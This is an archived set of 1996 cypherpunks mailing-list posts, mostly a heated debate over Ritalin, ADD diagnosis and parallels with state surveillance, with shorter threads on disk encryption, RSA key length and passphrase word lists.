MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> says:
 >Timothy C. May writes:
 >> At 1:14 PM 7/7/96, Simon Spero wrote:
 >> >On Sat, 6 Jul 1996, Timothy C. May wrote:
 >> >>
 >> >> When the mother (a single mother, as this is California) drops her son off
 >> >> with my friend (also single, of course), she includes several "Ritalin"
 >> >> capsules with instructions on how to dose her son with this
 >> >> depressant/behavior modification drug.
 >> >
 >> >Er... Tim... Ritalin is an amphetamine.
 >> 
 >> Whatever. It acts as a calmant/tranquilizer/depressant on many.
 >
 >Only those who have ADD, which you claim doesn't exist.
 >
 >> (As with many drugs, there are apparently paradoxical effects. Alcohol is a
 >> downer for some, and upper for others.)
 >
 >Alcohol is a CNS depressant for all. Lowering inhibitions tends to
 >make people relax and "party", but it doesn't have particularly
 >paradoxical effects.
 >
 >.pm
 >
 	Sorry, but that's wrong. There must be some understanding of what's
 actually going on. Brain is not just a simple linear device. It's complex.
 And that goes to Tim's original point:
 
 	Society is made by humans with brains that are complex but which
 try to use simple models to understand reality. Let me show with
 your own example. 
 
 	Alcohol *is* a depressant. But it doesn't act equally on all the
 CNS. It acts faster on one part of it whose role is to depress all the
 rest of the CNS. So, first alcohol depresses a depressor and therefore
 acts as a stimulant. If you maintain your levels of alcohol there the
 rest of your brain will be above its threshold and keep stimulated. Only
 if you pass that threshold the rest of the brain will be depressed.
 
 	That's what alcohol drinking cultures like mine call "knowing how to
 drink". But then we don't know about taking cocaine (like some centroamerican
 cultures do) for instance.
 
 	Same happens when you take other drugs (in their own context). It's
 only when you simplify or make a generalization that it gets dangerous. And
 same goes for society.
 
 	If you have a society that teachs people how to drink you'll have
 less problems than one that doesn't. Or that teachs how to eat coca leaves
 avoiding the pure drug. Or that teaches you that curare is OK eaten -as it
 is- but letal in the blood (which allows survival for many tribes).
 
 	That's were Tim's argument comes into cypherpunkish arena. If you
 teach people that it is easier to calm down hyperactive people, or solve
 all problems by increasing mind control and surveillance you can't
 complain of a police state. OTOH if you can teach people were to stop
 (as with alcohol) and that simple models just don't work you'll be on
 the road to a better system.
 
 	I agree there is people that can benefit from drugs. But being a
 MD PhD myself too, I also know that the amount that really needs them is
 a minuscule proportion. Most times it is just a convenience for doctors,
 family, fathers or society. Though good doctors agree it would be better
 if they could avoid the drugs at all in most cases of mental disease.
 
 	Same happens with surveillance: we benefit from some control to
 stop those few, exceptional, deep criminals that are better stopped in advance,
 but we don't really need as much as we have. There are better solutions,
 but it's far more convenient for power-holders to increase surveillance
 than to really address the underlying problems.
 
 	But, IMHO, as long as we keep allowing many people to use simple
 and "convenience" models to quickly fix symptomps instead of addressing
 the real problem (like, e.g. making a greater effort in the education of
 their children), we are stating the basis for a future, more restrictive,
 controlling and "convenience" system.
 
 	We need both, to educate people on a more responsible course of
 action, and develop tools to stop or make more difficult or less
 convenient the easy and fast solution of increasing surveillance instead
 of addressing the underlying problem. And that's where cryptography comes
 to help equate the balance and increases presure on power-holders into
 worrying more by decreasing the convenience of surveillance.
 
 	That is, all in my most very humble opinion.
 
 				jr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Jul 1996 06:14:33 +0800
To: blanc <blancw@accessone.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <01BB6D3B.F25E8780@blancw.accessone.com>
Message-ID: <199607091555.LAA13724@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



blanc writes:
> > I suppose you don't understand what it might be like for someone to be
> > unable to do their work no matter how heavy the threat against them if
> > they don't, and no matter how easy it is. There are people out there
> > who can't get themselves to pay a phone bill or throw out the
> > newspapers for months on end -- they just can't get themselves to
> > dance around into the task no matter how hard they try, no matter how
> > great the threat (job loss, etc) to them is.
[...]
> There are times when people have been totally unmotivated to take care
> of themselves or the mundane matters in life because they were not
> involved in the pursuits which were of true value to them, and life
> "lost its meaning".

Blanc, you really aren't listening.

There are people out there who are desperately unhappy. They can't
concentrate at all. They love what they do for a living, if only they
could actually manage to do it four days out of five. They are not in
the least scared of cleaning their homes, except for the fact that
they are frightened of the fact that they can't manage to do it no
matter what they try. They'd like to pay the light bill -- really --
but every time they start they get distracted, or they get distracted
before they start. Sometimes they get bursts of hyperconcentration and
they can work for two days straight on some project, and they end it
and realize that the phone's been cut off because they completely
spaced dealing with it or anything else. Sometimes they feel very
pissed off because people tell them to just "apply themselves" more or
"manage their time" better or "get a more motivating job".

Such people aren't upset that life has lost its meaning. They are
often perfectly intelligent, capable of being happy in their pursuits,
and not bad individuals. They suffer, however, from an inability to
keep from twitching. They ritualistically play with common objects --
rubber bands, paperclips, etc, folding and unfolding them, winding and
unwinding them, etc. You can spot them -- they're the people who even
as adults can be placed in a nearly empty room and will find a small
object to play with. Their workspaces are littered with small fidget
toys they have purloined or created. 

These people aren't unhappy with their jobs except for the fact that
they wish they could get their work done, they sit in front of their
work for hours on end, and can't get anywhere. They don't need new
pursuits. Even with newere and "better" jobs, most people on earth have
to occassionally maintain their attention long enough to pay their
landlord or what have you.

> Putting one's priorities into perspective can do a lot towards feeling
> motivated to attend to life's minor contingencies, while elevating the
> lesser items to the top of the hierarchy can totally dissipitate one's
> energies and interest.

Look, quit trying to tell people who have ADD that they are in the
wrong jobs, that they are unmotivated, that they are "lazy", or
whatever. Calling them "nuts" is actually far better. It at least
acknowledges that there is something wrong that isn't readily fixed by
the nostrums of people who have no idea whatsoever what they are going
through.

Perhaps, of course, we can just get all the suicidal people on earth
to quit wanting to kill themselves by intoning to them "don't be sad"
over and over again. I doubt it, though.

> Maybe Ritalin could make them forgot their true interest which was lying
> dormant, pushed away by who-knows-what kind of arguments against it, and
> help them to start paying attention again to those mundane, irrelevant
> aspects of existence.

Or maybe, when they take it, the noise in their heads stops, the world
focuses and clears up, and suddenly it doesn't seem like its so hard
to finish that two paragraph status summary after all. Maybe they take
it and suddenly they can function long enough to finish their resume
and get another job. Maybe you should quit telling other people how to
get through life when you haven't lived inside their heads.

> You're right, Perry, that no one should be making that decision for
> others.  I do think, though, that achieving self-command by a conscious
> knowledge of what is right for one's nature is actually the most
> beneficial (and less controversial).

Its always better to not need to use chemicals to help yourself
out. However, we acknowledge in our society that when someone has an
infected leg we decide that they aren't being "bad" by taking drugs to
stop the infection.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Wed, 10 Jul 1996 05:53:26 +0800
To: Elliot Lee <sopwith@redhat.com>
Subject: Re: What remains to be done.
In-Reply-To: <Pine.LNX.3.93.960708205907.28245G-100000@redhat.com>
Message-ID: <Pine.SUN.3.91.960709115634.3387E-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Jul 1996, Elliot Lee wrote:

> On Mon, 8 Jul 1996, Ray Arachelian wrote:
> 
> > I'm constantly switching between NT and 95 and have them installed on the 
> > same drive.  Would be cool to have some low level driver to encryption 
> > from the Master Boot Record for example to get around unfriendly OS's- but 
> > then NT won't respect the BIOS calls, 95 in 32 bit mode won't, Linux sure 
> > as hell wont, etc....
> 
> Linux, however, does have the cfs (crypted filesystem), which will let you
> do the same thing. Supposedly lets you plug in your own encryption method
> and all that... Also allows different users to encrypt with different
> passwords, and such (or just the root user encrypt the whole partition).
> Find the web page for more info.

Not quite what I'm looking for I'm afraid.  What I want is a big 
partition that's encrypted, but accessible from Windows NT, 95, and 
Linux.  In other words, I need an encrypted drive device driver for all 
of the above operating systems that's compatible across them.

So when I'm running NT, I can use the drive, when I'm running 95 I can 
use the drive, when I'm running Linux I can use the drive.  Now linux has 
a nice UMS which lets me access DOS drives.  If that were merged with - 
say SecureDrive, and if SecureDrive were rewritten as a 32 bit VxD 
minidriver for 95, and if there were a version of the same for NT, >THAT< 
would be cool. :)

==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Tue, 9 Jul 1996 21:38:40 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960709120112.21003a36@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


>
>Yeah, you know, I bet your body doesn't get infected for lack of
>penicillin, either. I suspect that taking Penicillin prepares you for
>drug dependancies. Why, next, you might take insulin to deal with
>diabetes, or worse!
>
	Or worse! You could take penicillin for an infection. Why the
hell do you think we need doctors? And antibiotics beyond penicillin?
Just because too many damn schmuck take it for almost anything, and
have been creating resistences giving the rest of us worst, resisting
diseases that were originally easy to treat and are now letal.

>Thank god most of those heroin addicts never had Ritalin as kids -- you
>never know how much worse off they might be now. And if they'd gotten
>antibiotics, why, forget it.
>
>Quit from modern medicine cold turkey. Its the only way.
>
>Perry

	The thing to remember is always that there's a place for everything
under the sun, but that one shouldn't allow it to extend beyond reasonable
ground or look upon it as some magic solution to everything.

	There's a place for crypto. It's been OK while only a few guys
used it because only a few guys needed it. But when we talk about allowing
the government to impose a crypto policy that will allow them to have
more power than needed, we are stating the basis for future, worst
diseases.

	You speak of insulin. Most diabetics can just manage with a good
diet. Even insulin dependant ones can make dietary excesses from time to
time if they know how to. Giving those who don't need it insulin or
forbidding the occasional party to those who depend on insulin -as has
been done by doctor for years- is teaching people to depend on "doctor's
control magic" or "drug control magic".

	It's as bad encouraging people who don't need a drug to take it as
encouraging people to believe doctors won't make mistakes. It's as bad to
let people believe that strong crypto for them will solve their problems
as encouraging them to believe that they should leave all crypto control
on the government's hands because they won't make mistakes or abuses.

	So what? We need strong crypto as we need strong antibiotics, but
we also need to teach people when and how to use it, what its pros and
cons are, and form people into a more conscious use of technology and
not to believe in crypto- drug- or technology-magic at all.

				jr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 10 Jul 1996 09:27:18 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607091807.OAA13871@jekyll.piermont.com>
Message-ID: <199607091902.MAA18000@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com>

 > A total distortion of the man's point. Imagine someone
 > suffering from an unknown ailment for years. One day, he is
 > finally diagnosed, a treatment is given, and he feels
 > better.

 > All you can do is try to argue that he shouldn't be treated.

I think the problem here is in making the "diagnosis" the
all-singing all-dancing point around which everything else
revolves.

If we have safe and effective medications which increase
alertness in the school and in the workplace, why shouldn't
everyone be able to take them in small doses as the need arises?
We only need to invent a "syndrome" or a "disorder" around such
things because we make such an enormous distinction between
"medicines", which are good, and "drugs", which are bad.

Inventing mythological ailments and "politicizing dissent" has
other disadvantages as well.  Little Johnny's perfectly valid
criticisms of the local NEA stormtrooper can be easily dismissed
by an explanation that Johnny has "Authority Defiance Disorder",
or some other convenient thing that permits Johnny to be tranked
senseless whenever he might say something awkward in public.

This has close ties to the way those in authority, and their
minions, regularly diagnose people like us with labels like
"anti-government" as in "The anti-Government Freemen", "The
anti-Government Militias", or "The anti-Government
Crypto-Anarchists."

 > Did you listen to that guy at all? He was in pain and
 > anguish over the fact that his life was totally screwed up
 > in spite of his best efforts to make a go at work he loved.
 > Now he can function. You want him to be "diverse" and go on
 > not functioning. He doesn't want that. Who are you to tell
 > him how live his own life?

The human body is a homeostatic system.  Let's see what this
guy's mood looks like in 30 years and see how he feels about
Ritalin taking then.  By that time, he may be taking the same
dose he is today just to feel as rotten as he did before he
started taking it at all.

Not uncommon at all in the "drugs help me function" crowd.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Jul 1996 05:33:20 +0800
To: JR@ns.cnb.uam.es
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <960709155621.21003a36@ROCK.CNB.UAM.ES>
Message-ID: <199607091614.MAA13761@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



JR@ns.cnb.uam.es writes:
> 	Someone said about a kid not concentrating on grammar. Hell, I
> couldn't stand half of my professors in class, though I would perfectly
> listen to the same subject with other people.

I bet you go up to people in near suicidal states and tell them "hey,
get a life", don't you.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Tue, 9 Jul 1996 21:26:56 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960709122701.21003a36@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> says:
Mike Duvos writes:
> Perry Writes:
> 
> > Most people would have no particular urge to stop a child with
> > diabetes from taking her insulin. Your friend seems to have the sick
 ...   ... 
> Since diabetes has an organic cause, this analogy with syndromes and
> disorders defined solely by behavioral percentages fails.

'fraid not. ADD has an organic cause, and can be detected
with reproduceable biological tests.

	Agreed, but the point is IMHO that not everybody that takes it
do actually need it, and that it is worst for them as well as for the
rest of us (indirectly). And I don't think there's any point in
denying there is a strong and widespread abuse of "easy solutions"
(like government mandated key scrow for instance).

>Admittedly, ADD is nonfatal, and I will agree that the analogy breaks
>down there. I will also agree that it may be overdiagnosed -- that is,
>misdiagnosed by sloppy practitioners. That does not mean it isn't real.
>
	That's it. Agreed again.

....
>Has it occurred to you that many of the children in question are happy
>being medicated, as are many adults? In any case, who are you to tell
>other people what's good for them?
>
>Perry

	Wrong. Many people feel happy taking antibiotics for a cold. But
it is worst for the vast majority of them. A cold is produced by viruses
on which no antibiotic is effective. But they kill their natural baterial
barrier, making them more prone to a serious disease. And they select
AB-resistant bacteria which will spread to other innocent people later.

	Anyway, I'm nobody to tell them to stop killing themselves. But
*I* am ENTITLED to tell them not to kill *ME* by selecting resistant
microorganisms when they take antibiotics they shouldn't. For *I* will
have to stand those myself later. I don't tell them what's good for them.
I do tell them what's BAD for ME.

	As well as I tink I'm not entitled to forbid anyone to smoke, but
I am to expect they not to in my presence and to respect my health if I
politely ask them so.

	I am not entitled to say which crypto anyone has to use. But I
am entitled to expect no one will force me into using one that will be
worst for me in the long run. And would rather prefer if people knew 
what they do and the extent on which they can rely on crypto when they
use it.
				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 10 Jul 1996 10:09:15 +0800
To: cypherpunks@toad.com
Subject: Contracts, Responsibilities, and Drug-Dispensing
Message-ID: <ae07fd960d021004be78@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



There have been some statements here that "Tim is interfering in the
choices of others." In particular, Perry has been saying I am a hypocrite,
that I wish to interfere with the choices of others, and so and so forth.

Let's make something clear:

-- I have no "contract" to supply drugs to anyone, nor does the friend I
have been discussing, who makes a choice _not_ to dose the friends of his
son who are in his house.

-- This "contractarian" analysis should be important to any libertarian or
believer in civil rights.

-- If someone makes a contract, formal or informal (with some caveats), to
supply a dose of drugs, alcohol, whatever, at some specified time, then
this is fine. But if no contract exists, not supplying the drugs is not
interference in choice. (Is, for a example, a Mormon interfering in the
rights of a friend by refusing to supply a drink to a visiting friend? Am I
interfering in the choice of others by refusing to allow cigarette smoking
in my home? Examples like this are easy to find.)

-- If someone claims there is an _implied_ contract in this case, this
falls apart after the first "refusal" to supply the dose. That is, Vickie,
the mother, is well aware that my friend is returning the Ritalins to her
unused, in the kid's backpack. That she continues to send the kid over,
absent the drug dose she would have preferred her son to be given, means
she has effectively made a choice that maybe the Ritalin dose is not so
important after all (or at least that my friend is able to "control" and
"handle" the kid without the drug...maybe this is giving her some second
thoughts about dosing the kid into compliance even on the weekends?).

[A cynic might suggest she is letting the alleged violations of her son's
rights  "pile up" so she can bring a lawsuit and get some of his money!
:-}]

So, I reject the straw man arguments that I am interfering with the
"rights" of others. My house, my rules. My friend's house, his rules. And
one of his rules is that he refuses to become a pill dispenser for
mind-altering drugs. Vickie can accept these rules, or not. Her choice.

(And part of this, as perhaps I did not make clear enough, is that he
doesn't like the idea of his _own_ son seeing his Dad dispensing
mind-control drugs to make a kid more compliant and passive. He is
obviously well within his rights to refuse to be a drug supplier. His
house, his rules. Would this apply if the visiting kid needed an injection
of insulin? Maybe, maybe not. It would depend. Speaking for myself, I would
refuse to supply injections of insulin to a child--I'd tell the mother or
father to not expect me to administer medical treatments beyond simple
things like aspirins or band-aids on cuts and scrapes. My house, my rules.)

It's always useful in discussing "rights," as Perry is doing, in terms of
contracts and agreements. To paraphrase Lysander Spooner, I can't find my
name or the name of my friend on any contract about supplying drugs to
visiting children.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Tue, 9 Jul 1996 21:55:03 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607090550.WAA28057@netcom14.netcom.com>
Message-ID: <Pine.HPP.3.91.960709121843.22212A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Regarding the 'paradoxical' effect of speed on children:

It seems that age might not be the deciding factor. Scanning abstracts
of Medline articles on the subjects of methylfenidate AND <variants of
ADHD>, 469 hits in English, I found the one below. Perhaps the Swedish
speed epidemia in the 60-70's, now having sort of a comeback, was/is
partly self-medication. Note that this is about ADULTS and that the
research was made in 'The Peoples Republic of Massachusetts' (as someone
just called it). That these guys calm down on a drug that makes most
people the other way around suggests a structural difference; that some
of us are suffering from 'Ritalin deficiency'.

***********************************************************************
Spencer T. Wilens T. Biederman J. Faraone SV. Ablon JS. Lapey K.

Pediatric Psychopharmacology Unit, Massachusetts General Hospital,
Boston, USA.

A double-blind, crossover comparison of methylphenidate and placebo in
adults with childhood-onset attention-deficit hyperactivity disorder.

Archives of General Psychiatry. 52(6):434-43, 1995 Jun.


Abstract

BACKGROUND: There are few controlled studies of methylphenidate
hydrochloride in adults with attention-deficit hyperactivity disorder
(ADHD), and their results have been equivocal. The discrepancies among
these studies may be related to low doses, diagnostic uncertainties,
and lack of attention to comorbid disorders.
METHODS: We conducted a randomized, 7-week, placebo-controlled,
crossover study of methylphenidate in 23 adult patients with DSM-III-R
ADHD using standardized instruments for diagnosis, separate assessments
of ADHD and depressive and anxiety symptoms, and a robust daily dose of
methylphenidate hydrochloride, 1.0 mg/kg per day.
RESULTS: We found a marked therapeutic response for methylphenidate
treatment of ADHD symptoms that exceeded the placebo response (78% vs
4% P < .0001). Response to methylphenidate was independent of gender,
psychiatric comorbidity with anxiety or moderate depression, or family
history of psychiatric disorders.
CONCLUSION: Robust doses of methylphenidate are effective in the
treatment of adult ADHD.
***********************************************************************


Asgaard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 10 Jul 1996 08:58:02 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.SUN.3.94.960709130057.23321A-100000@polaris>
Message-ID: <199607091945.MAA21866@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:

 > I keep looking around wondering if the list is being
 > trolled.  (Anyone else notice Mr. Duvos' username is "mpd"?)

Pretty obvious it's my initials, as opposed to one of the other
thousand or so acronyms it collides with.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Tue, 9 Jul 1996 21:34:55 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960709124751.21003a36@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


Hey Perry,

	I think you are taking this too far. I believe that almost nobody
(there are always some exceptions) will deny the existence of disease. And
while Tim may not be a great doctor and even totally wrong in the case he
stated, the original point was not to discuss a specific medical case.

	You may -or not- agree that there is abuse. You may -or not- be
esceptical on the statistics. But there is no point in denying that it
is far easier in most cases to fix the symptoms than actually solve the
problem. Not that I say doctors do. God forbids.


	And from the very onset Tim explained his point in not building
a mental control society. And there's no point in denying that it is far
easier for most societies to have full mental control of their subjects
(to which technology aids) than to fix the big social problems.

	If you can't see the parallel, I'd advise a visit to the doctor.
Not to consult him, but to stay with her or him for a while and see what
patients demand and how well educated is our society into looking deep to
the problems instead of taking shortcuts. My experience as MD before I
switched to computing was very illustrating. Long ago, granted, but
interesting indeed.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Wed, 10 Jul 1996 07:26:25 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <2.2.32.19960709165921.006856d0@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:20 PM 7/8/96 -0400, you wrote:

:Human stupidity is never a surprise.
:
:Perry

Perry is a significant factor I include when I decide every day whether or
not to check my cypherpunk's mail. I'm glad I did today. What a hoot!

Alec





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 10 Jul 1996 07:40:57 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.SUN.3.94.960709022546.4459B-100000@infinity.c2.net>
Message-ID: <Pine.SUN.3.94.960709130057.23321A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, William Knowles wrote:

> Below is a list of famous people with Attention Deficit Disorders 
> and/or Learning Disorders, and I'd be willing to bet that Perry Metzger
> either has, or knows someone with ADD. 
>  
> Albert Einstein, Galileo, Mozart, Wright Brothers, Leonardo da Vinci,
> Bruce Jenner, Tom Cruise, Charles Schwab, Henry Winkler, Danny Glover,
> Walt Disney, John Lennon, Winston Churchill, Henry Ford, 
> Stephen Hawkings, Jules Verne, Alexander Graham Bell, Woodrow Wilson, 
> Hans Christian Anderson,Beavis, Nelson Rockefeller, Thomas Edison, 
> Gen. George Patton, Agatha Christie, John F. Kennedy, Whoopi Goldberg, 
> Rodin, Thomas Thoreau, David H. Murdock, Dustin Hoffman, Pete Rose, 
> Russell White, Jason Kidd, Russell Varian, Robin Williams, Louis Pasteur, 
> Werner von Braun, Dwight D. Eisenhower, Robert Kennedy, alberto Tnmba
> Prince Charles, Gen. Westmoreland, Eddie Rickenbacker, Gregory Boyington, 
> Harry Belafonte, F. Scott Fitzgerald, Steve McQueen, George C. Scott, 
> Tom Smothers, Lindsay Wagner, George Bernard Shaw, Beethoven, Carl Lewis, 
> Jackie Stewart, "Magic" Johnson, Weyerhauser family, Wrigley, John Corcoran.

Considering that most of these examples existed, even thrived before the
existance of the medications being discussed, it would seem to me you just
shot yourself in the foot with a rather large bore weapon.

I'd also like to know how one diagnoses an entire family with a condition
that is rarely, if ever, passed on genetically.

Look, perhaps a certain medication has helped you.  Fine.  I'm sure
alt.medication.advocacy will be interested.  Even as this may be so,
lumping all learning disabilities in with ADD (an overdiagnosed condition
generally the result of second career housewives who to our
collective misfortunes managed to get a master's in social work and read a
few booklets on ink-blot testing and aquire a job at the local middle
school by means not at all related to their intellectual capacity) is
both a mistake, and misleading.  So too is the implication that drips from
your post that medications could have helped all the people you list
above.

If anything, the list indicates that the importance of medication is
slight.

And will someone please tell me how  Leonardo da Vinci was diagnosed
either with ADD or a Learning Disorder?  Or why "Beavis" was included?

I used to think Mr. Metzger was just being an old fuddie duddie when he
complained about topicality.

I keep looking around wondering if the list is being trolled.  (Anyone
else notice Mr. Duvos' username is "mpd"?)

> One can only wonder how much more great some of the people on this list would 
> be today if they knew ADD back then.   

This is a list for discussing cryptography and the occasional
political offshoots thereof.  Given your post above, it's fairly clear
that your medication has done little to keep your thoughts on track.  

So, your post is entirely off topic, and lacking in any logical support
for what it is you proport to advocate.

I would prefer an unmedicated Stephen Hawkings, thank you.

> William Knowles    <erehwon@c2.org>
> PGP mail welcome & prefered / KeyID 1024/2C34BCF9
> PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
> Finger for public key

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Wed, 10 Jul 1996 10:59:39 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Word lists for passphrases [vocabularypunks]
In-Reply-To: <Pine.LNX.3.94.960709010857.1246B-100000@gak>
Message-ID: <m2spb1b2py.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Mark" == Mark M <markm@voicenet.com> writes:

Mark> According to Altavista:

Mark> nethermost   - 45
Mark> insatiable   - 200
Mark> insufferable - 200

Mark> I know I have too much free time.

According to Dejanews:
  Individual word hit counts                                                 
     * nethermost: 185
     * insatiable: 1191
     * insufferable: 752
     * antidisestablishmentarianism: 142   :-)

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 10 Jul 1996 07:39:30 +0800
To: ois-news@offshore.com.ai
Subject: Offshore Information Services is Back after Bertha
Message-ID: <Pine.LNX.3.91.960709133918.156A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Hurricane Bertha hit Anguilla just perfectly to do the most damage. Just
north of the storm the counterclockwise spin and westward movements add
for maximum destructive power, and we were just north of it.  Don't know
of any people or houses that were hurt, but a bunch of power and phone
lines have been damaged. 

We lost power, ran for about 10 hours on battery, and then shut down. But
about 24 hours later we are back online to stay. 

We are temporarily located in the Cable and Wireless building in town.
Thanks Cable and Wireless!

And thanks to everyone for your patience,

     Vince Cate
     Offshore Information Services Ltd
     Anguilla, Eastern Caribbean
     http://online.offshore.com.ai/


   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 10 Jul 1996 08:09:43 +0800
To: cypherpunks@toad.com
Subject: Re: A case for 2560 bit keys
In-Reply-To: <199607090309.XAA00077@darius.cris.com>
Message-ID: <Pine.LNX.3.94.960709134510.248A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 8 Jul 1996, David F. Ogren wrote:

> Despite the above, there are convincing arguments for longer RSA keys.
> Instead of asking "Why should we have longer keys?", perhaps we should be
> asking "Why _shouldn't_ we have longer keys?"
> 
> In a hybrid cryptosystem such as PGP, very little of the computational
> process is consumed by RSA encryption.  Only a tiny fraction of the message
> is RSA encrypted (the session key), and thus the time-critical operation is
> the symmetric crypto system (IDEA for PGP).
> 
> As an experiment generate a 2047 bit PGP key and a 512 bit PGP key.
> Encrypt a file (preferably of a reasonable size) using both keys.
> Depending on the computer you are using, the time difference between the
> two keys will be a matter of few seconds or even a fraction of a second.

Now try decrypting the file, or signing another file.  I have a 486-66 which
is now considered hopelessly sluggish by today's standards.  It takes about
5 seconds, while doing the same operation with a 512-bit key takes less than a
second.  I sign every one of my messages, so such a time delay gets quite
annoying.  I do have a 2048-bit key and encourage people to encrypt messages
with it, but I won't be signing messages with that key anytime soon unless
there is a much faster mpilib for PGP.

Other than that, I do completely agree with what you have written.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeKcCLZc+sv5siulAQERzwP/UblIctGSBcQ+ZPxvhBchcUoEfaERUHcN
GKdJhZGV5Pb2GeQfAhG3Hsn0eHMKJFNP1AgB4Q6E4VoOhQzfOClOd4x3m9DOEmCC
ezJFg7/YxlJ7kzk8e8XYD6pXKYMWGLlsQi6lrS0wZcmsi6rmWGqr7ao7tlQA9+vg
rxNCd30uw6Y=
=yZm+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Jul 1996 11:24:30 +0800
To: "David F. Ogren" <cypherpunks@toad.com
